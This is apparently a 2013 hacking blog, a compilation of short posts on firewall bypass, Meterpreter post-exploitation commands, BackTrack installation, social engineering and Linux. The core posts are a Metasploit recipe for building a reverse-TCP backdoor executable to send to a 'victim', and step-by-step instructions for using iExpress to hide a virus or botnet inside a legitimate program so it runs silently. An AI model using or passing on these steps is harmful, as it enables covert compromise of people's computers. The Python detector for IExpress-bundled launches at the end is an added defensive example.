Monday, March 11, 2013

How to open blocked websites in 1 step


1. This method is useful when you’re behind a firewall:
Type
ping <url>
Then copy the IP address from the output and try opening it in your browser.
2. This method is used when the URL is blocked:
Just type “https” instead of “http:” or “www”.

Meterpreter Commands


Here is a list with some Meterpreter commands that can be used for post exploitation.
 
- screengrab
 Take a screenshot of the victim's computer

- run scriptname
 Run Meterpreter-based scripts; for a full list, check the scripts/meterpreter directory

- sysinfo
 Show the system information of the remote target

- ls
 List the files and folders on the target

- use priv
 Load the privilege extension for extended Meterpreter libraries

- use incognito
 Load the incognito functions (used for token stealing and impersonation on a target machine)
 

Dual Boot: BackTrack and Windows


This method of installation is the simplest. I have written it on the assumption that you have a Windows installation that takes up all the space on your disk drive, and that you would like to resize and repartition the drive to allow a BackTrack install alongside Windows.

DON'T FORGET TO BACK UP YOUR WINDOWS INSTALLATION FIRST!

Burn it to a DVD or a flash drive, then place the DVD in your computer’s drive and reboot. The system will boot into a console and you will see a prompt; choose the 1st option. To boot into a Live KDE desktop, type startx and press the Enter key on your keyboard.

1. Once in the Live desktop, click on the Install BackTrack icon on the desktop.

Social Engineering


Kevin Mitnick, one of the most famous social engineers in the world, popularized the term “social engineering.”
Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.
“Albert Einstein once said, “Information is not knowledge.” That is a powerful thought. Just reading this book will not somehow implant this knowledge into your being. Apply the principles, practice what is taught in these pages, and make the information a part of your daily life. When you do that is when you will see this knowledge take effect.”
Christopher Hadnagy
The first book to reveal and dissect the technical aspect of many social engineering maneuvers: Download here.

Linux Essentials Manual


The new LPI Linux Essentials exam was launched at LinuxTag this week and Linup Front released their e-book on Linux Essentials at the same time under a Creative Commons license.

The Linux Essentials defines the basic knowledge required to competently use a desktop or mobile device using a Linux Operating System.

The Linux Essentials certificate is slated to define the basic knowledge necessary to use a Linux computer productively, and through a corresponding education programme aid young people and adults new to the open source community in understanding Linux and open-source software in the context of the ICT industry.

Linux Essentials is a new certification by the Linux Professional Institute (LPI).

Commands, compressing files, networking, programming language and much more. Download here.

How to Backdoor Windows Using Metasploit




Follow these 4 simple steps and have fun.


1. Open a terminal and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=(YOUR IP) LPORT=(CHOOSE A PORT) x > /root/Desktop/CHOOSE_A_FILE_NAME.exe
Now that our exploit is done:
2. Go to Metasploit console by typing msfconsole and type:
3. Now send the file to the victim; as soon as they download and open it, there is a Meterpreter shell on the victim's computer.
That's it!
 
**It is important to hide the exploit behind another file.
Click here to see how to bind a file.

How to bind using iExpress


In Windows:
1. Go to “Start” and hit “Run”.
2. Then type in “iexpress” and hit “Ok”.
3. Make sure the check box is on “Create new Self Extraction Directive file”, then hit “Next”.
4. Click on the checkbox “Extract files and run an installation command”, then hit “Next”.
5. Then choose a name or just hit the space bar once, to make a space in the textbox, then hit “Next”.
6. Then make sure the checkbox is on “No Prompt”, then hit “Next”.
7. Then set the checkbox to “Do not display a license”, then hit “Next”.
8. Then hit “Add” on the iexpress box, and a window should pop up; browse your computer and find your Virus EXE, then hit “Open”.
9. Once you're done with that, it should take you back to the iexpress window; hit “Add” again. Browse your computer again, but this time for the program you want to run after your botnet. Then hit “Open”.
10. After you're done adding the botnet/virus and the program to the bind list, hit “Next”.
11. Now on the first drop down box (Install Program) put your Virus there.
12. Now select your program you want to run after the bot in the next drop down box. (Post Install Command). Then hit “Next”.
13. Now next select the checkbox “Hidden”, and hit “Next”.
14. Then select “No Message”, then hit “Next”.
15. Now select “Browse” and find where you want to save your new bound exe, then type a name for it and hit “Save”.
16. Now select the checkbox “Hide File Extracting Progress Animation from User”, then hit “Next”.
17. Then hit the checkbox “No restart”, and hit “Next”.
18. Then click “Don't Save” and hit “Next”.
19. Then hit the “Finish” button…
Enjoy your new bound exe.
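
For defenders, a package built this way leaves a recognisable runtime trace: an IExpress self-extractor unpacks into a `%TEMP%\IXP000.TMP\` style directory and starts both the install program and the post-install command from there. The following is an added example, not part of the original post, that flags this pattern in process-creation events; the event tuples are constructed sample data and their field layout is an assumption.

```python
import re
from collections import defaultdict

# Temporary extraction directory used by IExpress self-extractors,
# e.g. C:\Users\bob\AppData\Local\Temp\IXP000.TMP\setup.exe
IXP_PATH = re.compile(
    r"^(?P<dir>.*\\IXP\d{3}\.TMP)\\(?P<exe>[^\\]+\.exe)$", re.IGNORECASE
)

# Constructed sample events: (time, parent_pid, parent_image, child_image).
# The layout is an assumption; map it from your own process-creation log.
SAMPLE_EVENTS = [
    ("10:01:02", 4120, r"C:\Users\bob\Downloads\photo_viewer.exe",
     r"C:\Users\bob\AppData\Local\Temp\IXP000.TMP\svc_update.exe"),
    ("10:01:03", 4120, r"C:\Users\bob\Downloads\photo_viewer.exe",
     r"C:\Users\bob\AppData\Local\Temp\IXP000.TMP\viewer.exe"),
    ("10:05:40", 5300, r"C:\Users\bob\Downloads\vendor_setup.exe",
     r"C:\Users\bob\AppData\Local\Temp\IXP001.TMP\setup.exe"),
    ("10:07:11", 900, r"C:\Windows\explorer.exe",
     r"C:\Program Files\App\app.exe"),
]


def find_bundled_launches(events):
    """Group children started from an IXP###.TMP directory by their parent.

    One child is what an ordinary IExpress installer does ("info").
    Two or more different executables from the same package means an install
    program plus a post-install command, which is worth triage ("high").
    Legitimate packages can do this too, so treat it as a lead, not a verdict.
    """
    groups = defaultdict(set)
    for _ts, ppid, parent, child in events:
        match = IXP_PATH.match(child)
        if match:
            key = (ppid, parent, match.group("dir").lower())
            groups[key].add(match.group("exe").lower())

    findings = []
    for (ppid, parent, directory), exes in groups.items():
        findings.append({
            "ppid": ppid,
            "parent": parent,
            "dir": directory,
            "children": sorted(exes),
            "severity": "high" if len(exes) >= 2 else "info",
        })
    return findings
```
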